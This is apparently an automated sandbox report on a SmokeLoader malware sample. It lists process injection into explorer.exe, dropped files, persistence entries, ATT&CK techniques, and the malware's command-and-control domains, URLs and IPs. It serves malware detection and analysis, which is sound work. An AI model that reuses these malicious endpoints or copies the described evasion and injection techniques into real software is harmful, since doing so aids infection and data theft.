    Source: C:\Users\user\Desktop\cOm0MmeV34.exeThread created: C:\Windows\explorer.exe EIP: 12219D0Jump to behavior
    Source: C:\Users\user\AppData\Roaming\tcgcucaThread created: unknown EIP: 32319D0Jump to behavior
    Injects code into the Windows Explorer (explorer.exe)
    Source: C:\Users\user\AppData\Local\Temp\5587.exeMemory written: PID: 1028 base: 11A0000 value: 20Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\5587.exeMemory written: PID: 1028 base: 11A1000 value: 48Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\5587.exeMemory written: PID: 1028 base: 3270030 value: 00Jump to behavior
    Maps a DLL or memory area into another process
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
    Source: C:\Users\user\Desktop\cOm0MmeV34.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
    Source: C:\Users\user\AppData\Roaming\tcgcucaSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
    Source: C:\Users\user\AppData\Roaming\tcgcucaSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
    Writes to foreign memory regions
    Source: C:\Users\user\AppData\Local\Temp\5587.exeMemory written: C:\Windows\explorer.exe base: 11A0000Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\5587.exeMemory written: C:\Windows\explorer.exe base: 11A1000Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\5587.exeMemory written: C:\Windows\explorer.exe base: 3270030Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\5587.exeCode function: 7_2_00007FF6A794FD80 CheckTokenMembership,FreeSid,AllocateAndInitializeSid,7_2_00007FF6A794FD80
    Source: explorer.exe, 00000002.00000000.2125710844.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
    Source: explorer.exe, 00000002.00000000.2122032948.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
    Source: explorer.exe, 00000002.00000000.2123464573.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2122032948.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
    Source: explorer.exe, 00000002.00000000.2122032948.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
    Source: explorer.exe, 00000002.00000000.2122032948.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
    Source: explorer.exe, 00000002.00000000.2121615024.0000000000EF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman

    Stealing of Sensitive Information

    barindex
    Yara detected SmokeLoader
    Source: Yara matchFile source: 00000004.00000002.2371278649.0000000003D01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000002.2371203663.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.2143935688.0000000002220000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.2144060492.0000000002241000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

    Remote Access Functionality

    barindex
    Yara detected SmokeLoader
    Source: Yara matchFile source: 00000004.00000002.2371278649.0000000003D01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000002.2371203663.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.2143935688.0000000002220000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.2144060492.0000000002241000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts321
    Windows Management Instrumentation    		11
    Registry Run Keys / Startup Folder    		1
    Access Token Manipulation    		11
    Masquerading    		OS Credential Dumping841
    Security Software Discovery    		Remote Services11
    Archive Collected Data    		11
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    Exploitation for Client Execution    		1
    DLL Side-Loading    		72
    Process Injection    		35
    Virtualization/Sandbox Evasion    		LSASS Memory35
    Virtualization/Sandbox Evasion    		Remote Desktop ProtocolData from Removable Media13
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
    Registry Run Keys / Startup Folder    		1
    Access Token Manipulation    		Security Account Manager3
    Process Discovery    		SMB/Windows Admin SharesData from Network Shared Drive4
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
    DLL Side-Loading    		72
    Process Injection    		NTDS1
    Application Window Discovery    		Distributed Component Object ModelInput Capture125
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Hidden Files and Directories    		LSA Secrets1
    File and Directory Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
    Obfuscated Files or Information    		Cached Domain Credentials213
    System Information Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
    Software Packing    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
    DLL Side-Loading    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
    File Deletion    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1476782 Sample: cOm0MmeV34.exe Startdate: 19/07/2024 Architecture: WINDOWS Score: 100 38 gebeus.ru 2->38 40 evilos.cc 2->40 56 Snort IDS alert for network traffic 2->56 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 7 other signatures 2->62 9 cOm0MmeV34.exe 2->9         started        12 tcgcuca 2->12         started        signatures3 process4 signatures5 72 Detected unpacking (changes PE section rights) 9->72 74 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->74 76 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 9->76 84 3 other signatures 9->84 14 explorer.exe 104 6 9->14 injected 78 Multi AV Scanner detection for dropped file 12->78 80 Machine Learning detection for dropped file 12->80 82 Maps a DLL or memory area into another process 12->82 process6 dnsIp7 42 gebeus.ru 186.145.236.93, 49710, 49711, 49712 TelmexColombiaSACO Colombia 14->42 44 64.190.113.113, 57789, 80 TRAVELCLICKCORP1US United States 14->44 46 6 other IPs or domains 14->46 32 C:\Users\user\AppData\Roaming\tcgcuca, PE32 14->32 dropped 34 C:\Users\user\AppData\Local\Temp\5587.exe, PE32+ 14->34 dropped 36 C:\Users\user\...\tcgcuca:Zone.Identifier, ASCII 14->36 dropped 48 System process connects to network (likely due to code injection or exploit) 14->48 50 Benign windows process drops PE files 14->50 52 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 14->52 54 5 other signatures 14->54 19 5587.exe 1 14->19         started        22 5587.exe 1 14->22         started        24 5587.exe 1 14->24         started        file8 signatures9 process10 signatures11 64 Check for Windows Defender sandbox 19->64 66 Machine Learning detection for dropped file 19->66 68 Changes memory attributes in foreign processes to executable or writable 19->68 70 3 other signatures 19->70 26 conhost.exe 19->26         started        28 conhost.exe 22->28         started        30 conhost.exe 24->30         started        process12

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    cOm0MmeV34.exe34%ReversingLabs
    cOm0MmeV34.exe100%Joe Sandbox ML

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\5587.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Roaming\tcgcuca100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\5587.exe5%ReversingLabs
    C:\Users\user\AppData\Roaming\tcgcuca34%ReversingLabs

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://android.notify.windows.com/iOS0%URL Reputationsafe
    https://powerpoint.office.comcember0%URL Reputationsafe
    https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
    https://api.msn.com/0%URL Reputationsafe
    https://excel.office.com0%URL Reputationsafe
    http://schemas.micro0%URL Reputationsafe
    http://crl.v0%URL Reputationsafe
    https://outlook.com0%URL Reputationsafe
    https://107.173.160.139/0%Avira URL Cloudsafe
    https://167.235.128.153/0%Avira URL Cloudsafe
    http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe
    http://gebeus.ru/tmp/index.php100%Avira URL Cloudmalware
    https://word.office.comon0%Avira URL Cloudsafe
    http://evilos.cc/tmp/index.php100%Avira URL Cloudmalware
    http://cx5519.com/tmp/index.php100%Avira URL Cloudmalware
    https://107.173.160.137/0%Avira URL Cloudsafe
    http://www.oberhumer.com0%Avira URL Cloudsafe
    http://office-techs.biz/tmp/index.php100%Avira URL Cloudmalware
    https://wns.windows.com/)s0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    evilos.cc
    		127.0.0.127
    		truetrue
      		unknown
      gebeus.ru
      		186.145.236.93
      		truetrue
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://107.173.160.139/true
        • Avira URL Cloud: safe
        		unknown
        https://107.173.160.137/true
        • Avira URL Cloud: safe
        		unknown
        http://cx5519.com/tmp/index.phptrue
        • Avira URL Cloud: malware
        		unknown
        https://167.235.128.153/true
        • Avira URL Cloud: safe
        		unknown
        http://gebeus.ru/tmp/index.phptrue
        • Avira URL Cloud: malware
        		unknown
        http://office-techs.biz/tmp/index.phptrue
        • Avira URL Cloud: malware
        		unknown
        http://evilos.cc/tmp/index.phptrue
        • Avira URL Cloud: malware
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://word.office.comonexplorer.exe, 00000002.00000000.2125710844.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000002.00000000.2132312933.000000000C860000.00000004.00000001.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://android.notify.windows.com/iOSexplorer.exe, 00000002.00000000.2123656424.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://powerpoint.office.comcemberexplorer.exe, 00000002.00000000.2130995903.000000000C460000.00000004.00000001.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000002.00000000.2130995903.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://api.msn.com/explorer.exe, 00000002.00000000.2125710844.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://excel.office.comexplorer.exe, 00000002.00000000.2125710844.0000000009B41000.00000004.00000001.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://schemas.microexplorer.exe, 00000002.00000000.2125224128.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2124496825.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2125190406.0000000008870000.00000002.00000001.00040000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://crl.vexplorer.exe, 00000002.00000000.2121615024.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://outlook.comexplorer.exe, 00000002.00000000.2125710844.0000000009B41000.00000004.00000001.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://www.oberhumer.com5587.exe, 5587.exe.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://wns.windows.com/)sexplorer.exe, 00000002.00000000.2125710844.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        77.221.157.163
        		unknownRussian Federation
        		30968INFOBOX-ASInfoboxruAutonomousSystemRUtrue
        107.173.160.139
        		unknownUnited States
        		36352AS-COLOCROSSINGUStrue
        186.145.236.93
        		gebeus.ruColombia
        		14080TelmexColombiaSACOtrue
        107.173.160.137
        		unknownUnited States
        		36352AS-COLOCROSSINGUStrue
        58.151.148.90
        		unknownKorea Republic of
        		17858POWERVIS-AS-KRLGPOWERCOMMKRtrue
        167.235.128.153
        		unknownUnited States
        		3525ALBERTSONSUStrue
        64.190.113.113
        		unknownUnited States
        		26646TRAVELCLICKCORP1UStrue

        Private

        IP
        127.0.0.127

        General Information

        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1476782
        Start date and time:2024-07-19 13:42:08 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 9m 25s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:12
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:1
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:cOm0MmeV34.exe
        renamed because original name is a hash value
        Original Sample Name:b31900ffd17c8b2ecfaa9b7b6f4cdca3.exe
        Detection:MAL
        Classification:mal100.troj.evad.winEXE@11/4@3/8
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 99%
        • Number of executed functions: 48
        • Number of non-executed functions: 41
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Override analysis time to 240000 for current running targets taking high CPU consumption

        Warnings

        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
        • Not all processes where analyzed, report is missing behavior information
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size exceeded maximum capacity and may have missing disassembly code.
        • Report size getting too big, too many NtDeviceIoControlFile calls found.
        • Report size getting too big, too many NtEnumerateKey calls found.
        • Report size getting too big, too many NtOpenKey calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Report size getting too big, too many NtReadVirtualMemory calls found.
        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        • VT rate limit hit for: cOm0MmeV34.exe

        Simulations

        Behavior and APIs

        TimeTypeDescription
        07:43:26API Interceptor474090x Sleep call for process: explorer.exe modified
        13:43:25Task SchedulerRun new task: Firefox Default Browser Agent 4D324EDD35513DE3 path: C:\Users\user\AppData\Roaming\tcgcuca
        13:45:27AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Update#0428_8yUscnjrUY C:\Users\user\AppData\Local\Temp\5587.exe
        13:45:36AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Update#0428_8yUscnjrUY C:\Users\user\AppData\Local\Temp\5587.exe

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        77.221.157.1638GJ842Gu9e.exeGet hashmaliciousSmokeLoaderBrowse
        • 77.221.157.163/systemd.exe
        rs6c8bBX5r.exeGet hashmaliciousSmokeLoaderBrowse
        • 77.221.157.163/systemd.exe
        Nodf3hIUrK.exeGet hashmaliciousSmokeLoaderBrowse
        • 77.221.157.163/systemd.exe
        uue9O7WXRA.exeGet hashmaliciousSmokeLoaderBrowse
        • 77.221.157.163/systemd.exe
        y2b1PHwo8d.exeGet hashmaliciousSmokeLoaderBrowse
        • 77.221.157.163/systemd.exe
        SWjcpYfYPy.exeGet hashmaliciousSmokeLoaderBrowse
        • 77.221.157.163/systemd.exe
        WwqOJ8GXw7.exeGet hashmaliciousSmokeLoaderBrowse
        • 77.221.157.163/systemd.exe
        file.exeGet hashmaliciousSmokeLoaderBrowse
        • 77.221.157.163/systemd.exe
        file.exeGet hashmaliciousSmokeLoaderBrowse
        • 77.221.157.163/systemd.exe
        file.exeGet hashmaliciousSmokeLoaderBrowse
        • 77.221.157.163/systemd.exe
        107.173.160.1398GJ842Gu9e.exeGet hashmaliciousSmokeLoaderBrowse
          rs6c8bBX5r.exeGet hashmaliciousSmokeLoaderBrowse
            Nodf3hIUrK.exeGet hashmaliciousSmokeLoaderBrowse
              uue9O7WXRA.exeGet hashmaliciousSmokeLoaderBrowse
                y2b1PHwo8d.exeGet hashmaliciousSmokeLoaderBrowse
                  SWjcpYfYPy.exeGet hashmaliciousSmokeLoaderBrowse
                    WwqOJ8GXw7.exeGet hashmaliciousSmokeLoaderBrowse
                      file.exeGet hashmaliciousSmokeLoaderBrowse
                        186.145.236.93file.exeGet hashmaliciousSmokeLoaderBrowse
                        • gebeus.ru/tmp/index.php
                        JQhvrKfKRE.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
                        • movlat.com/tmp/
                        107.173.160.1378GJ842Gu9e.exeGet hashmaliciousSmokeLoaderBrowse
                          rs6c8bBX5r.exeGet hashmaliciousSmokeLoaderBrowse
                            Nodf3hIUrK.exeGet hashmaliciousSmokeLoaderBrowse
                              uue9O7WXRA.exeGet hashmaliciousSmokeLoaderBrowse
                                y2b1PHwo8d.exeGet hashmaliciousSmokeLoaderBrowse
                                  SWjcpYfYPy.exeGet hashmaliciousSmokeLoaderBrowse
                                    WwqOJ8GXw7.exeGet hashmaliciousSmokeLoaderBrowse
                                      file.exeGet hashmaliciousSmokeLoaderBrowse

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        gebeus.ru8GJ842Gu9e.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 217.219.131.81
                                        8GJ842Gu9e.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 187.199.228.245
                                        rs6c8bBX5r.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 189.232.42.250
                                        rs6c8bBX5r.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 196.189.156.245
                                        Nodf3hIUrK.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 190.13.174.94
                                        uue9O7WXRA.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 2.185.214.11
                                        uue9O7WXRA.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 116.58.10.60
                                        y2b1PHwo8d.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 181.129.118.140

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        TelmexColombiaSACOMCiOZ89mRZ.elfGet hashmaliciousMiraiBrowse
                                        • 186.145.37.43
                                        mips.elfGet hashmaliciousMiraiBrowse
                                        • 181.51.185.172
                                        1yBFfYi5Do.elfGet hashmaliciousUnknownBrowse
                                        • 186.82.88.1
                                        file.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 190.156.239.49
                                        jew.spc.elfGet hashmaliciousMiraiBrowse
                                        • 190.158.82.8
                                        6Qb1vfdujy.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                        • 181.51.51.141
                                        y7cm9CKSN9.elfGet hashmaliciousMiraiBrowse
                                        • 181.63.135.113
                                        S5cXNeuCGu.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 190.156.239.49
                                        file.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 190.159.30.35
                                        arm4-20240709-0417.elfGet hashmaliciousMiraiBrowse
                                        • 186.87.128.79
                                        INFOBOX-ASInfoboxruAutonomousSystemRU8GJ842Gu9e.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 77.221.157.163
                                        rs6c8bBX5r.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 77.221.157.163
                                        rs6c8bBX5r.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 77.221.157.163
                                        Nodf3hIUrK.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 77.221.157.163
                                        NY2mig4fQh.exeGet hashmaliciousCryptOne, RHADAMANTHYSBrowse
                                        • 77.221.154.49
                                        uue9O7WXRA.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 77.221.157.163
                                        y2b1PHwo8d.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 77.221.157.163
                                        SWjcpYfYPy.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 77.221.157.163
                                        WwqOJ8GXw7.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 77.221.157.163
                                        file.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 77.221.157.163
                                        AS-COLOCROSSINGUS8GJ842Gu9e.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 107.173.160.137
                                        Price List.xlsGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 192.3.13.57
                                        payment_application.xlsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 107.172.4.179
                                        PO_202407174854.xlsGet hashmaliciousUnknownBrowse
                                        • 104.168.32.10
                                        SHP_01992336.vbsGet hashmaliciousRemcosBrowse
                                        • 198.46.176.133
                                        PO_202407174854.xlsGet hashmaliciousUnknownBrowse
                                        • 104.168.32.10
                                        PO_202407174854.xlsGet hashmaliciousUnknownBrowse
                                        • 104.168.32.10
                                        ViZX47VcWr.rtfGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 107.172.4.179
                                        me.me.me.me.mememe.docGet hashmaliciousFormBookBrowse
                                        • 198.46.176.133
                                        RFQ_PR_241000993.docx.docGet hashmaliciousFormBookBrowse
                                        • 198.46.176.133
                                        AS-COLOCROSSINGUS8GJ842Gu9e.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 107.173.160.137
                                        Price List.xlsGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 192.3.13.57
                                        payment_application.xlsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 107.172.4.179
                                        PO_202407174854.xlsGet hashmaliciousUnknownBrowse
                                        • 104.168.32.10
                                        SHP_01992336.vbsGet hashmaliciousRemcosBrowse
                                        • 198.46.176.133
                                        PO_202407174854.xlsGet hashmaliciousUnknownBrowse
                                        • 104.168.32.10
                                        PO_202407174854.xlsGet hashmaliciousUnknownBrowse
                                        • 104.168.32.10
                                        ViZX47VcWr.rtfGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 107.172.4.179
                                        me.me.me.me.mememe.docGet hashmaliciousFormBookBrowse
                                        • 198.46.176.133
                                        RFQ_PR_241000993.docx.docGet hashmaliciousFormBookBrowse
                                        • 198.46.176.133

                                        JA3 Fingerprints

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        a6c95ef2da5b759f65c60665167952ee8GJ842Gu9e.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 107.173.160.139
                                        • 107.173.160.137
                                        • 167.235.128.153
                                        rs6c8bBX5r.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 107.173.160.139
                                        • 107.173.160.137
                                        • 167.235.128.153
                                        rs6c8bBX5r.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 107.173.160.139
                                        • 107.173.160.137
                                        • 167.235.128.153
                                        Nodf3hIUrK.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 107.173.160.139
                                        • 107.173.160.137
                                        • 167.235.128.153
                                        uue9O7WXRA.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 107.173.160.139
                                        • 107.173.160.137
                                        • 167.235.128.153
                                        y2b1PHwo8d.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 107.173.160.139
                                        • 107.173.160.137
                                        • 167.235.128.153
                                        SWjcpYfYPy.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 107.173.160.139
                                        • 107.173.160.137
                                        • 167.235.128.153
                                        WwqOJ8GXw7.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 107.173.160.139
                                        • 107.173.160.137
                                        • 167.235.128.153
                                        file.exeGet hashmaliciousSmokeLoaderBrowse
                                        • 107.173.160.139
                                        • 107.173.160.137
                                        • 167.235.128.153

                                        Dropped Files

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        C:\Users\user\AppData\Local\Temp\5587.exe8GJ842Gu9e.exeGet hashmaliciousSmokeLoaderBrowse
                                          rs6c8bBX5r.exeGet hashmaliciousSmokeLoaderBrowse
                                            rs6c8bBX5r.exeGet hashmaliciousSmokeLoaderBrowse
                                              Nodf3hIUrK.exeGet hashmaliciousSmokeLoaderBrowse
                                                uue9O7WXRA.exeGet hashmaliciousSmokeLoaderBrowse
                                                  y2b1PHwo8d.exeGet hashmaliciousSmokeLoaderBrowse
                                                    SWjcpYfYPy.exeGet hashmaliciousSmokeLoaderBrowse
                                                      WwqOJ8GXw7.exeGet hashmaliciousSmokeLoaderBrowse
                                                        file.exeGet hashmaliciousSmokeLoaderBrowse

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

                                                          Download File
                                                          Process:C:\Windows\explorer.exe
                                                          File Type:JSON data
                                                          Category:modified
                                                          Size (bytes):1022
                                                          Entropy (8bit):5.252542495586483
                                                          Encrypted:false
                                                          SSDEEP:24:YqHZ6T06Mhm50mMb0O0bihm5TmM6CUXyhm5+dmMbxdB6hm5CUmMz0Jahm5gmMbNS:YqHZ6T06McbMb0O0bicMMDUXycRMbxdy
                                                          MD5:2F99BED9FF8C41AFEE96B028ED8B86A2
                                                          SHA1:BF4E91361EE28C5506E812F2BF8C3495676097B0
                                                          SHA-256:F4C2EB86983ED94B60DD5041C9DDCCC2E06C9F4DD810A8D90FBCCAE82620741C
                                                          SHA-512:834B9B236AF231632E106CAE3E2F22EF09B2445E64536C7FF0F2F61BC240AFA84BB66093135B317A227B3E2D9BBCAA1EDFE65F87483CB3C12F67C3E80E5A436C
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview:{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":2357654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":2347654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":2337654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2327654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":2317654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2307654912,"LastSwitchedHighPart":31061703,

                                                          C:\Users\user\AppData\Local\Temp\5587.exe

                                                          Download File
                                                          Process:C:\Windows\explorer.exe
                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):991232
                                                          Entropy (8bit):7.315028226948047
                                                          Encrypted:false
